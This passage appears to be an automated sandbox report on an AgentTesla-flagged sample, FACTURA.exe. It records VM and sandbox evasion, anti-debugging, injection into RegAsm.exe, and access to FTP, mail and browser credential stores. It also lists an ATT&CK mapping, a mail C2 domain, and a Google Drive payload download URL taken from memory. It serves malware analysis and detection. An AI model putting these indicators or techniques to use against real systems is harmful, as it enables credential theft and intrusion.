            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: FACTURA.exe, 00000000.00000002.2937398693.00000000022D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: FACTURA.exe, 00000000.00000002.2937398693.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7428749510.00000000015D0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: FACTURA.exe, 00000000.00000002.2936737183.0000000000764000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 0000000D.00000002.7428749510.00000000015D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1AORIYDM8NMJHXLNPTG05G7X-YPQ0CDIZ
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2076Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9958Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeSystem information queried: ModuleInformationJump to behavior
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWS|v
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: RegAsm.exe, 0000000D.00000002.7428749510.00000000015D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8hh
            Source: FACTURA.exe, 00000000.00000002.2937398693.00000000022D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: FACTURA.exe, 00000000.00000002.2937398693.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7428749510.00000000015D0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: FACTURA.exe, 00000000.00000002.2939216402.0000000004D19000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: FACTURA.exe, 00000000.00000002.2936737183.0000000000764000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 0000000D.00000002.7435299732.0000000002F89000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01286958 KiUserExceptionDispatcher,LdrInitializeThunk,13_2_01286958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1340000Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: RegAsm.exe, 0000000D.00000002.7434039789.0000000001B30000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000014.00000002.7429438694.000002AEFC060000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000000D.00000002.7434039789.0000000001B30000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000014.00000002.7429438694.000002AEFC060000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 0000000D.00000002.7434039789.0000000001B30000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000014.00000002.7429438694.000002AEFC060000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 0000000D.00000002.7434039789.0000000001B30000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000014.00000002.7429438694.000002AEFC060000.00000002.00020000.sdmpBinary or memory string: @Program Manager
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4060, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4060, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4060, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FACTURA.exe7%ReversingLabsWin32.Trojan.Mucc

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            tccinfaes.com3%VirustotalBrowse
            mail.tccinfaes.com11%VirustotalBrowse
            x1.i.lencr.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.microso0%Avira URL Cloudsafe
            http://mail.tccinfaes.com100%Avira URL Cloudmalware
            https://AuRruF1eYt.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://x1.i.lencr.org/0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://PBlDXJ.com0%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            https://AuRruF1eYt.comt-0%Avira URL Cloudsafe
            http://tccinfaes.com0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://r3.i.lencr.org/0)0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tccinfaes.com
            188.93.227.195
            truetrueunknown
            drive.google.com
            172.217.168.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.181.225
              truefalse
                high
                mail.tccinfaes.com
                unknown
                unknowntrueunknown
                x1.i.lencr.org
                unknown
                unknownfalseunknown
                doc-04-88-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-04-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1m9q33vpcq2d9i6097uacpkl7/1634134650000/00014782062933200622/*/1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.microsoUserOOBEBroker.exe, 00000014.00000002.7427039674.000002AEFB9D0000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
